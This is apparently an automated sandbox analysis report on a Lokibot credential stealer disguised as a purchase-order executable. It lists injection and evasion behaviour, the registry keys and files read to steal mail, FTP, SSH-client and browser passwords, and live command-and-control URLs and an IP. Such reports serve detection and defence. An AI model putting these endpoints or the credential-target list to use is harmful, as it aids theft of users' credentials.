              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe TID: 7004Thread sleep time: -660000s >= -30000s
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00402630 FindFirstFileA,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeThread delayed: delay time: 60000
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeAPI call chain: ExitProcess graph end node
              Source: nnrr3w4buo.0.drBinary or memory string: YvMcI
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019EA56 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019E842 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019EB84 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019EB07 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019EB46 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeMemory written: C:\Users\user\Desktop\Purchase Order #5000012803.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00406069 GetUserNameW,

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000001.00000003.898744992.00000000006FC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Purchase Order #5000012803.exe PID: 7000, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)Show sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: PopPassword
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: SmtpPassword
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000001.00000003.898744992.00000000006FC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Purchase Order #5000012803.exe PID: 7000, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2Input Capture1File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Credentials in Registry2System Information Discovery5SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading11NTDSSecurity Software Discovery11Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsProcess Discovery1SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Purchase Order #5000012803.exe26%ReversingLabsWin32.Backdoor.Androm
              Purchase Order #5000012803.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              0.2.Purchase Order #5000012803.exe.22d0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.1.Purchase Order #5000012803.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
              1.0.Purchase Order #5000012803.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.0.Purchase Order #5000012803.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.2.Purchase Order #5000012803.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://slimpackage.com/slimfit/five/fre.php100%Avira URL Cloudmalware
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              slimpackage.com
              104.223.93.105
              truetrue
                unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://slimpackage.com/slimfit/five/fre.phptrue
                • Avira URL Cloud: malware
                unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_ErrorPurchase Order #5000012803.exefalse
